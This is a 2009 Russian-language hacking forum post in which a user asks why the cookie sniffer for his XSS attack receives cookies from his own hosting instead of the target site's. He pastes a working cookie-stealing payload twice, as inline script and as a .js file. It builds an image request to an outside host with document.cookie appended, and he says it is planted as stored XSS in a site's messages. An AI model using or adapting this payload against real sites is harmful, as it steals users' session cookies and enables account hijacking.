12.02.2009, 21:14
|
|
Новичок
Регистрация: 10.02.2009
Сообщений: 7
С нами:
9077586
Репутация:
3
|
|
Сообщение от mozarat
У меня такая проблема...
Вобщем есть xss, все делаю правильно... Но мне приходят куки того хостинга на котором лежит мой сниффер. Если на народе страница с редиректом на сниффер, то приходят куки народа... Xss пасивная. Кто знает что может быть?
А если свой сниффер размещю на своем хостинге, то куки приходят тоже моего хостинга =\
Код присутствующий на странице такой:
PHP код:
<script>img = new Image(); img.src = "http://na-s.ru/images/mozarat_1.gif?"+document.cookie;</script>
Это в .html
Или еще в .js
PHP код:
img = new Image(); img.src = "http://na-s.ru/images/mozarat_1.gif?"+document.cookie;
Xss активная прописывается в сообщении. Сайт выполняет код с заданой ссылки(сайта).
Ставил снииффер на lcoalhoste и сайт (двиг самописаный), и куки приходят нормальные.
|
|
|